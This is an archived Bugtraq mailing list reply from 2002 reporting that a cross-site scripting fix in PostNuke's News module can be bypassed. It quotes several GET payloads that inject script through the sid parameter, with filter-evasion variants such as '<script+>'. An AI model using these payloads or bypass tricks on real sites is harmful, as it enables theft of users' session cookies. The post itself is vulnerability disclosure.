Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: Postnuke XSS fixed
From: Sebastian Konstanty Zdrojewski <s.zdrojewski () not2you com>
Date: Thu, 03 Oct 2002 09:10:23 +0200

I saw the problem has been solved, and the get you proposed below are no
more working. But if you use the following get, the popup appears again:

on the url http://news.postnuke.com/modules.php

the get

?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script+>

Best Regars,

Sebastian

Daniel Woods wrote:

 >Humm!
 >
 >
 >
 >
 >Not so fast on the praise :(
 >
 >It only took me a couple of workarounds to find ways to bypass the check.
 >
 >  http://news.postnuke.com/modules.php
 >   
?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
 >
 >Using the request...
 >   
?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>
 >gives me the DB Error: message
 >
 >And using the request...
 >   
?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>
 >gives me the Alert Popup and DB Error: message...  the '+' is treated
as a blank.
 >
 >Thanks... Dan.
 >
 >
 >

--
Sebastian Konstanty Zdrojewski
IT Analyst

Neticon a brand of Every Level S.r.l.
Via Valtellina 16 - 20159 Milano - MI - Italy

Phone    (+39) 02.68.80.731
E-Mail   s.zdrojewski () neticon it
Website  http://www.neticon.it







  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]